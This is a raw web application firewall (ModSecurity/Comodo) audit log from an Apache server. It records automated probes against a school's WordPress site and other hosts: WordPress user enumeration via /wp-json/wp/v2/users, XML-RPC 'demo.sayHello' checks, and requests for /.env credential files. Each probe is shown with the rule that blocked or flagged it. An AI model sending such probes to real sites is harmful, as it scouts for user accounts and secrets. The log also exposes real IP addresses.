Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f64632b-Z-- --e0099f39-A-- [10/May/2025:13:15:57 +0700] aB7vHRLuBiaF9R054QBf-wAAAA0 103.236.140.4 34898 103.236.140.4 8181 --e0099f39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.121 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e0099f39-C-- demo.sayHello --e0099f39-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0099f39-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746857757753342 5302 (- - -) Stopwatch2: 1746857757753342 5302; combined=3951, p1=498, p2=3235, p3=30, p4=33, p5=92, sr=71, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0099f39-Z-- --c7718055-A-- [10/May/2025:13:16:00 +0700] aB7vIBLuBiaF9R054QBf_QAAAAA 103.236.140.4 34902 103.236.140.4 8181 --c7718055-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.233 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c7718055-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7718055-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746857760725778 1839 (- - -) Stopwatch2: 1746857760725778 1839; combined=909, p1=304, p2=578, p3=0, p4=0, p5=26, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7718055-Z-- --843ec442-A-- [10/May/2025:13:16:04 +0700] aB7vJBLuBiaF9R054QBf_wAAAAY 103.236.140.4 34906 103.236.140.4 8181 --843ec442-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.233 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --843ec442-C-- demo.sayHello --843ec442-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --843ec442-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746857764879133 4876 (- - -) Stopwatch2: 1746857764879133 4876; combined=3777, p1=481, p2=3097, p3=24, p4=25, p5=89, sr=67, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --843ec442-Z-- --13916619-A-- [10/May/2025:13:17:41 +0700] aB7vhRLuBiaF9R054QBgAgAAAAI 103.236.140.4 34918 103.236.140.4 8181 --13916619-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --13916619-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13916619-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746857861337119 2707 (- - -) Stopwatch2: 1746857861337119 2707; combined=1100, p1=374, p2=701, p3=0, p4=0, p5=25, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13916619-Z-- --f1103425-A-- [10/May/2025:13:17:45 +0700] aB7viRLuBiaF9R054QBgBAAAAA4 103.236.140.4 34922 103.236.140.4 8181 --f1103425-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.126 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f1103425-C-- demo.sayHello --f1103425-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1103425-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746857865613156 5128 (- - -) Stopwatch2: 1746857865613156 5128; combined=4074, p1=477, p2=3386, p3=28, p4=32, p5=88, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1103425-Z-- --2b93e709-A-- [10/May/2025:13:20:06 +0700] aB7wFhLuBiaF9R054QBgEgAAAA4 103.236.140.4 34964 103.236.140.4 8181 --2b93e709-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2b93e709-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b93e709-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746858006275377 3292 (- - -) Stopwatch2: 1746858006275377 3292; combined=1415, p1=486, p2=897, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b93e709-Z-- --0b9d8643-A-- [10/May/2025:13:20:10 +0700] aB7wGhLuBiaF9R054QBgFAAAABc 103.236.140.4 34968 103.236.140.4 8181 --0b9d8643-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.152 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0b9d8643-C-- demo.sayHello --0b9d8643-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b9d8643-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746858010779886 4565 (- - -) Stopwatch2: 1746858010779886 4565; combined=3630, p1=435, p2=2998, p3=22, p4=25, p5=88, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b9d8643-Z-- --7ae5f74f-A-- [10/May/2025:13:22:41 +0700] aB7wsauC4AqLGUOyzyX_UgAAAJg 103.236.140.4 34982 103.236.140.4 8181 --7ae5f74f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7ae5f74f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ae5f74f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746858161716857 3084 (- - -) Stopwatch2: 1746858161716857 3084; combined=1316, p1=457, p2=825, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ae5f74f-Z-- --de0be361-A-- [10/May/2025:13:22:48 +0700] aB7wuKuC4AqLGUOyzyX_VAAAAIY 103.236.140.4 34986 103.236.140.4 8181 --de0be361-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.7 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --de0be361-C-- demo.sayHello --de0be361-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --de0be361-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746858168840270 6263 (- - -) Stopwatch2: 1746858168840270 6263; combined=4404, p1=568, p2=3574, p3=38, p4=35, p5=109, sr=82, sw=80, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de0be361-Z-- --6dae653d-A-- [10/May/2025:13:29:06 +0700] aB7yMhLuBiaF9R054QBgIAAAAAI 103.236.140.4 35048 103.236.140.4 8181 --6dae653d-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 164.92.244.132 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 164.92.244.132 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --6dae653d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6dae653d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746858546399844 699 (- - -) Stopwatch2: 1746858546399844 699; combined=228, p1=197, p2=0, p3=0, p4=0, p5=31, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6dae653d-Z-- --de870716-A-- [10/May/2025:13:29:14 +0700] aB7yOtr9PbfRBMhzxmRfSgAAAEI 103.236.140.4 35066 103.236.140.4 8181 --de870716-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.130.110.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.130.110.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --de870716-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de870716-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746858554808619 3108 (- - -) Stopwatch2: 1746858554808619 3108; combined=1434, p1=466, p2=936, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de870716-Z-- --ff76d74b-A-- [10/May/2025:14:10:58 +0700] aB78Atr9PbfRBMhzxmRf4AAAAEY 103.236.140.4 37418 103.236.140.4 8181 --ff76d74b-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 46.101.111.185 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 46.101.111.185 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --ff76d74b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff76d74b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746861058909548 708 (- - -) Stopwatch2: 1746861058909548 708; combined=305, p1=265, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff76d74b-Z-- --e6fe8317-A-- [10/May/2025:14:18:01 +0700] aB79qdr9PbfRBMhzxmRh4AAAAFE 103.236.140.4 46540 103.236.140.4 8181 --e6fe8317-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 65.20.181.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 65.20.181.225 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e6fe8317-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6fe8317-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746861481232162 3134 (- - -) Stopwatch2: 1746861481232162 3134; combined=1396, p1=460, p2=905, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6fe8317-Z-- --8f8d272d-A-- [10/May/2025:14:40:16 +0700] aB8C4Mi6w7GTj2w44Z6pqAAAAM4 103.236.140.4 45062 103.236.140.4 8181 --8f8d272d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.136 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8f8d272d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f8d272d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746862816683576 3652 (- - -) Stopwatch2: 1746862816683576 3652; combined=1608, p1=494, p2=1055, p3=0, p4=0, p5=59, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f8d272d-Z-- --2e7d966e-A-- [10/May/2025:14:40:19 +0700] aB8C48i6w7GTj2w44Z6pqQAAAMo 103.236.140.4 45136 103.236.140.4 8181 --2e7d966e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.136 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2e7d966e-C-- demo.sayHello --2e7d966e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e7d966e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746862819700714 6492 (- - -) Stopwatch2: 1746862819700714 6492; combined=5015, p1=642, p2=4140, p3=36, p4=43, p5=91, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e7d966e-Z-- --3cbbde7f-A-- [10/May/2025:14:46:54 +0700] aB8EbquC4AqLGUOyzyUJ0QAAAIs 103.236.140.4 53020 103.236.140.4 8181 --3cbbde7f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3cbbde7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3cbbde7f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746863214843867 2631 (- - -) Stopwatch2: 1746863214843867 2631; combined=1342, p1=432, p2=881, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3cbbde7f-Z-- --4828e856-A-- [10/May/2025:14:46:58 +0700] aB8EchLuBiaF9R054QBsyAAAAA0 103.236.140.4 53104 103.236.140.4 8181 --4828e856-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.187 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4828e856-C-- demo.sayHello --4828e856-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4828e856-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746863218471337 5364 (- - -) Stopwatch2: 1746863218471337 5364; combined=4220, p1=510, p2=3480, p3=33, p4=36, p5=96, sr=74, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
